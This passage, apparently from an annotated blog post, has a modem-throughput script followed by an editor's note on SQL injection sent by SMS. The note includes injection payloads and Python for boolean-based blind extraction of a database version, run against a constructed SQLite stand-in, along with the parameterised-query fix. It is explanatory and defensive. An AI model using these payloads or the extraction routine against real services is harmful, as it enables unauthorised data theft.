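    """Messages per day if `modems` modules all sustain the average observed rate."""
    avg = sum(v["per_hour"] for v in rates.values()) / len(rates)
    return round(avg * modems * 24)


if __name__ == "__main__":
    rt, rej, rows = parse_stats(STATS_SAMPLE)
    rates = throughput(rt, rows)
    for name, v in rates.items():
        print(f"{name}: {v['per_hour']}/h, busy {v['busy_pct']}%, failed {v['fail_pct']}%")
    print("8 modules over 24 h:", daily_capacity(rates, 8))
```

On the post's own numbers this gives 547, 538 and 555 messages per hour for GSM1 to GSM3 with the modems busy sending roughly 78% of the hour, and a projection of about 105,000 messages per day for eight modules, in line with the figures the post reports.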
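A note on the "Database injection over SMS" observations, from the editor rather than the post: `sleep()` and `@@version` are MySQL syntax, and in MySQL a `--` only starts a comment when it is followed by whitespace. That would explain why `keyword' or 1=1--` (which leaves the backend's closing quote unterminated) returned "no" while `keyword' or 1=1--'` returned 1: the trailing `--''` most likely parses as the arithmetic `- -''`, i.e. minus zero, not as a comment. The example below is editor-written code, not the post's or the SMS service's: a constructed SQLite stand-in for the keyword service that concatenates the message body into its query and answers `1`, `0` or `no` like the page shows, the boolean-based blind extraction that generalises the post's `substring(@@version,1,1)=4` probe to the whole version string, and the parameterised query that closes the hole. SQLite treats `--` as a comment unconditionally and has no `@@version`, so the payloads use a plain `--` and `sqlite_version()`; the table and function names are mine.

```python
import sqlite3

ALPHABET = "0123456789."   # enough for a dotted version string


def make_backend():
    """Constructed stand-in for the keyword service: one table, one valid keyword."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE keywords (keyword TEXT)")
    conn.execute("INSERT INTO keywords VALUES ('keyword')")
    return conn


def vulnerable_lookup(conn, body):
    """Pastes the SMS body into the SQL string. Answers '1'/'0' like the service on the
    page, and 'no' when the SQL no longer parses (the behaviour seen for a stray quote)."""
    sql = "SELECT count(*) FROM keywords WHERE keyword = '" + body + "'"
    try:
        count = conn.execute(sql).fetchone()[0]
    except sqlite3.Error:
        return "no"
    return "1" if count else "0"


def safe_lookup(conn, body):
    """Same query with a bound parameter: the body is data and can never alter the SQL."""
    count = conn.execute("SELECT count(*) FROM keywords WHERE keyword = ?", (body,)).fetchone()[0]
    return "1" if count else "0"


def extract_version(conn, oracle=vulnerable_lookup, max_len=20):
    """Boolean-based blind extraction, one character per position, using the post's
    keyword' and <condition>-- pattern. Stops when no candidate matches, which is what
    substr() past the end of the string produces."""
    found = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in ALPHABET:
            payload = f"keyword' and substr(sqlite_version(),{pos},1)='{ch}'--"
            if oracle(conn, payload) == "1":
                hit = ch
                break
        if hit is None:
            break
        found += hit
    return found


def true_version(conn):
    """Ground truth to compare the extracted string against."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_backend()
    for body in ("keyword", "keyword123", "keyword'", "nosuch' or 1=2--", "nosuch' or 1=1--"):
        print(f"{body!r:28} -> {vulnerable_lookup(db, body)}")
    print("extracted:", extract_version(db), "actual:", true_version(db))
    print("parameterised, same payload:", safe_lookup(db, "nosuch' or 1=1--"))
```

Each SMS is one oracle query, so the extraction above costs up to eleven messages per character; that is the reason a real attacker would move to the `sleep()`-style timing probe only when the boolean channel is unavailable, and the reason the defence is the bound parameter, not input filtering of quotes.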
Incredible rare and valuable info. Thank you. Keep going!
 

